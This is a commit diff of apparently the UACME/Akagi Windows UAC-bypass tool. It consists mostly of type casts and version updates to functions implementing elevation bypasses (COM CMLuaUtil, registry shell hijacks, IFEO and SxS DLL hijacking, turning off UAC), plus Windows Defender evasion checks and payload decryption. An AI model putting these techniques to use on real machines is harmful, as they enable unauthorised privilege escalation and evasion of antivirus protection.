v 3.1.0

Rearrange due to headers update.

Source/Akagi/compress.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       COMPRESS.C
 *
-*  VERSION:     3.00
+*  VERSION:     3.10
 *
-*  DATE:        02 Sep 2018
+*  DATE:        18 Nov 2018
 *
 *  Compression support.
 *
@@ -52,7 +52,7 @@ VOID EncodeBuffer(
 
     k = AKAGI_XOR_KEY;
     c = BufferSize;
-    ptr = Buffer;
+    ptr = (PUCHAR)Buffer;
 
     do {
         *ptr ^= k;
@@ -218,7 +218,7 @@ BOOL DecryptBuffer(
             break;
         }
 
-        pbKeyObject = HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);
+        pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);
         if (pbKeyObject == NULL)
             break;
 
@@ -267,7 +267,7 @@ BOOL DecryptBuffer(
 
         memIO = (SIZE_T)cbCipherData;
 
-        pbCipherData = supVirtualAlloc(
+        pbCipherData = (PBYTE)supVirtualAlloc(
             &memIO,
             DEFAULT_ALLOCATION_TYPE,
             DEFAULT_PROTECT_TYPE,
@@ -334,7 +334,7 @@ PVOID DecompressContainerUnit(
     _In_ DWORD cbBuffer,
     _In_ PBYTE pbSecret,
     _In_ DWORD cbSecret,
-    _Out_ PDWORD pcbDecompressed
+    _Out_ PULONG pcbDecompressed
 )
 {
     BOOL            bCond = FALSE;
@@ -469,12 +469,12 @@ PVOID DecompressPayload(
             //
             // Get key for decryption.
             //
-            pbSecret = SelectSecretFromBlob(PayloadId, &cbSecret);
+            pbSecret = (PBYTE)SelectSecretFromBlob(PayloadId, &cbSecret);
             if ((pbSecret == NULL) || (cbSecret == 0))
                 break;
 
-            UncompressedData = DecompressContainerUnit(
-                Data,
+            UncompressedData = (PUCHAR)DecompressContainerUnit(
+                (PBYTE)Data,
                 DataSize,
                 pbSecret,
                 cbSecret,
@@ -740,7 +740,7 @@ BOOL ProcessFileDCS(
         if (FileHeader->NumberOfBlocks == 0)
             break;
 
-        DataBuffer = supHeapAlloc(FileHeader->UncompressedFileSize);
+        DataBuffer = (PBYTE)supHeapAlloc(FileHeader->UncompressedFileSize);
         if (DataBuffer == NULL)
             break;
 
@@ -804,7 +804,7 @@ BOOL InitCabinetDecompressionAPI(
     VOID
 )
 {
-    HANDLE hCabinetDll;
+    HMODULE hCabinetDll;
 
     hCabinetDll = GetModuleHandle(TEXT("cabinet.dll"));
     if (hCabinetDll == NULL)

Source/Akagi/global.h

@@ -6,7 +6,7 @@
 *
 *  VERSION:     3.10
 *
-*  DATE:        12 Nov 2018
+*  DATE:        18 Nov 2018
 *
 *  Common header file for the program support routines.
 *
@@ -68,7 +68,6 @@
 #include "shared\cmdline.h"
 #include "shared\_filename.h"
 #include "shared\ldr.h"
-#include "shared\lsa.h"
 #include "shared\windefend.h"
 #include "shared\consts.h"
 #include "sup.h"

Source/Akagi/main.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       MAIN.C
 *
-*  VERSION:     3.00
+*  VERSION:     3.10
 *
-*  DATE:        25 Aug 2018
+*  DATE:        18 Nov 2018
 *
 *  Program entry point.
 *
@@ -22,7 +22,7 @@
 #pragma comment(lib, "opengl32.lib")
 #pragma comment(lib, "comctl32.lib")
 
-UACMECONTEXT g_ctx = { FALSE, 0, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 0, 0, {0}, {0}, {0}, {0}, {0} };
+UACMECONTEXT g_ctx;
 TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(=^..^=)" };
 
 static pfnDecompressPayload pDecryptPayload = NULL;
@@ -100,7 +100,7 @@ UINT ucmInit(
         PFD_MAIN_PLANE, 0, 0, 0, 0
     };
 
-    *Out = 0;
+    *Out = (UCM_METHOD)UacMethodInvalid;
 
     do {
 
@@ -159,20 +159,20 @@ UINT ucmInit(
                 supDebugPrint(L"wdLoadClient", Status);
             }
 #else
-            g_ctx.hMpClient = wdLoadClient(g_ctx.IsWow64, NULL);
+            g_ctx.hMpClient = (HINSTANCE)wdLoadClient(g_ctx.IsWow64, NULL);
 #endif
         }
 
         g_ctx.AkagiFlag = AKAGI_FLAG_KILO;
-        inst = NtCurrentPeb()->ImageBaseAddress;
+        inst = (HINSTANCE)NtCurrentPeb()->ImageBaseAddress;
 
         bytesIO = 0;
         RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
         GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
         if (bytesIO == 0)
             return ERROR_BAD_ARGUMENTS;
 
-        Method = strtoul(szBuffer);
+        Method = (UCM_METHOD)strtoul(szBuffer);
         *Out = Method;
 
 #ifndef _DEBUG
@@ -347,7 +347,7 @@ UINT ucmInit(
 UINT ucmMain()
 {
     UINT        uResult;
-    UCM_METHOD  Method = 0;
+    UCM_METHOD  Method = UacMethodInvalid;
 
     wdCheckEmulatedVFS();
 
@@ -401,7 +401,7 @@ INT ucmSehHandler(
         }
         if (uctx) {
             if (uctx->ucmMain) {
-                uctx->ucmMain = supDecodePointer(uctx->ucmMain);
+                uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);
                 uctx->ReturnedResult = uctx->ucmMain();
             }
         }

Source/Akagi/methods/api0cradle.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       API0CRADLE.C
 *
-*  VERSION:     3.00
+*  VERSION:     3.10
 *
-*  DATE:        25 Aug 2018
+*  DATE:        18 Nov 2018
 *
 *  UAC bypass method from Oddvar Moe aka api0cradle.
 *
@@ -52,7 +52,7 @@ BOOL ucmCMLuaUtilShellExecMethod(
             T_CLSID_CMSTPLUA,
             &IID_ICMLuaUtil,
             CLSCTX_LOCAL_SERVER,
-            &CMLuaUtil);
+            (void**)&CMLuaUtil);
 
         if (r != S_OK)
             break;

Source/Akagi/methods/deroko.c

@@ -145,7 +145,7 @@ BOOL ucmSPPLUAObjectMethod(
             + _strlen(RUNDLL_EXE_CMD)\
             + _strlen(FUBUKI_DEFAULT_ENTRYPOINTW)) * sizeof(WCHAR);
 
-        lpszCommandLine = supHeapAlloc(memIO);
+        lpszCommandLine = (LPWSTR)supHeapAlloc(memIO);
         if (lpszCommandLine) {
 
             _strcpy(lpszCommandLine, g_ctx.szSystemDirectory);

Source/Akagi/methods/enigma0x3.c

@@ -6,7 +6,7 @@
 *
 *  VERSION:     3.10
 *
-*  DATE:        11 Nov 2018
+*  DATE:        18 Nov 2018
 *
 *  Enigma0x3 autoelevation methods and everything based on the same
 *  ShellExecute related registry manipulations idea.
@@ -66,7 +66,7 @@ BOOL ucmHijackShellCommandMethod(
         else {
             sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
         }
-        lpBuffer = supHeapAlloc(sz);
+        lpBuffer = (LPWSTR)supHeapAlloc(sz);
         if (lpBuffer == NULL)
             break;
 
@@ -369,7 +369,7 @@ BOOL ucmAppPathMethod(
     do {
 
         sz = (1 + _strlen(lpszAppPathTarget)) * sizeof(WCHAR) + sizeof(T_APP_PATH);
-        lpKeyPath = supHeapAlloc(sz);
+        lpKeyPath = (LPWSTR)supHeapAlloc(sz);
         if (lpKeyPath == NULL)
             break;
 

Source/Akagi/methods/hakril.c

@@ -6,7 +6,7 @@
 *
 *  VERSION:     3.10
 *
-*  DATE:        11 Nov 2018
+*  DATE:        18 Nov 2018
 *
 *  UAC bypass method from Clement Rouault aka hakril.
 *
@@ -206,7 +206,7 @@ BOOL ucmHakrilMethod(
         //
         // Allocate and fill snap-in parameters buffer.
         //
-        g_SnapInParameters = supHeapAlloc(PAGE_SIZE);
+        g_SnapInParameters = (LPWSTR)supHeapAlloc(PAGE_SIZE);
         if (g_SnapInParameters == NULL)
             break;
 
@@ -217,7 +217,7 @@ BOOL ucmHakrilMethod(
         //
         // Setup function breakpoint.
         //
-        g_OriginalFunction = LaunchAdminProcessPtr;
+        g_OriginalFunction = (pfnAipFindLaunchAdminProcess)LaunchAdminProcessPtr;
         g_OriginalPrologue = 0;
         if (!AicSetRemoveFunctionBreakpoint(
             g_OriginalFunction,

Source/Akagi/methods/hybrids.c

@@ -6,7 +6,7 @@
 *
 *  VERSION:     3.10
 *
-*  DATE:        11 Nov 2018
+*  DATE:        18 Nov 2018
 *
 *  Hybrid UAC bypass methods.
 *
@@ -82,7 +82,7 @@ BOOL ucmAvrfMethod(
         _strcat(szBuffer, T_IFEO);
         RtlInitUnicodeString(&ustr, szBuffer);
         InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL);
-        if (!NT_SUCCESS(NtOpenKey(&hKey, MAXIMUM_ALLOWED, &obja)))
+        if (!NT_SUCCESS(NtOpenKey((PHANDLE)&hKey, MAXIMUM_ALLOWED, &obja)))
             break;
 
         //
@@ -991,7 +991,7 @@ BOOL ucmInetMgrFindCallback(
         if (hFileMapping == NULL)
             break;
 
-        MappedFile = MapViewOfFile(hFileMapping, PAGE_READWRITE, 0, 0, 0);
+        MappedFile = (PDWORD)MapViewOfFile(hFileMapping, PAGE_READWRITE, 0, 0, 0);
         if (MappedFile == NULL)
             break;
 
@@ -1261,7 +1261,7 @@ BOOL ucmSXSMethod(
 
         sz = UNICODE_STRING_MAX_BYTES;
 
-        lpszFullDllPath = supVirtualAlloc(
+        lpszFullDllPath = (WCHAR*)supVirtualAlloc(
             &sz,
             DEFAULT_ALLOCATION_TYPE,
             DEFAULT_PROTECT_TYPE,
@@ -1283,7 +1283,7 @@ BOOL ucmSXSMethod(
 
         sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
 
-        lpSxsPath = supVirtualAlloc(
+        lpSxsPath = (LPWSTR)supVirtualAlloc(
             &sz,
             DEFAULT_ALLOCATION_TYPE,
             DEFAULT_PROTECT_TYPE,
@@ -1800,7 +1800,7 @@ BOOL ucmSXSDccwMethod(
 
         sz = UNICODE_STRING_MAX_BYTES;
 
-        lpszFullDllPath = supVirtualAlloc(
+        lpszFullDllPath = (WCHAR*)supVirtualAlloc(
             &sz, 
             DEFAULT_ALLOCATION_TYPE, 
             DEFAULT_PROTECT_TYPE, 
@@ -1822,7 +1822,7 @@ BOOL ucmSXSDccwMethod(
 
         sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
 
-        lpSxsPath = supVirtualAlloc(
+        lpSxsPath = (LPWSTR)supVirtualAlloc(
             &sz,
             DEFAULT_ALLOCATION_TYPE,
             DEFAULT_PROTECT_TYPE,

Source/Akagi/methods/methods.c

@@ -6,7 +6,7 @@
 *
 *  VERSION:     3.10
 *
-*  DATE:        13 Nov 2018
+*  DATE:        18 Nov 2018
 *
 *  UAC bypass dispatch.
 *
@@ -150,7 +150,7 @@ ULONG CALLBACK SetMethodExecutionType(
 #ifdef _DEBUG
     WCHAR szBuffer[100];
 #endif
-    UCM_METHOD Method = PtrToUlong(Parameter);
+    UCM_METHOD Method = (UCM_METHOD)PtrToUlong(Parameter);
     MPCOMPONENT_VERSION SignatureVersion;
 
     if (g_ctx.hMpClient == NULL)

Source/Akagi/methods/methods.h

@@ -6,7 +6,7 @@
 *
 *  VERSION:     3.10
 *
-*  DATE:        11 Nov 2018
+*  DATE:        18 Nov 2018
 *
 *  Prototypes and definitions for UAC bypass methods table.
 *
@@ -75,6 +75,8 @@ typedef enum _UCM_METHOD {
     UacMethodMax
 } UCM_METHOD;
 
+#define UacMethodInvalid UacMethodTest
+
 #define UCM_DISPATCH_ENTRY_MAX UacMethodMax
 
 typedef struct _UCM_METHOD_AVAILABILITY {

Source/Akagi/methods/simda.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       SIMDA.C
 *
-*  VERSION:     3.00
+*  VERSION:     3.10
 *
-*  DATE:        31 Aug 2018
+*  DATE:        18 Aug 2018
 *
 *  Simda based UAC bypass using ISecurityEditor.
 *
@@ -142,7 +142,7 @@ BOOL ucmSimdaTurnOffUac(
 )
 {
     BOOL               bResult = FALSE;
-    HKEY               hKey;
+    HANDLE             hKey = NULL;
     DWORD              dwValue;
     WCHAR              szBuffer[MAX_PATH];
     UNICODE_STRING     ustr;

Source/Akagi/methods/wusa.c

@@ -4,9 +4,9 @@
 *
 *  TITLE:       WUSA.C
 *
-*  VERSION:     3.00
+*  VERSION:     3.10
 *
-*  DATE:        31 Aug 2018
+*  DATE:        19 Nov 2018
 *
 *  Windows Update Standalone Installer (WUSA) based routines.
 *
@@ -293,7 +293,7 @@ DWORD ucmxDirectoryWatchdogThread(
                     memIO = pInfo->FileNameLength +
                         ((1 + _strlen(szBuffer)) * sizeof(WCHAR));
 
-                    CapturedDirectoryName = supHeapAlloc(memIO);
+                    CapturedDirectoryName = (LPWSTR)supHeapAlloc(memIO);
 
                     if (CapturedDirectoryName) {
                         _strcpy(CapturedDirectoryName, szBuffer);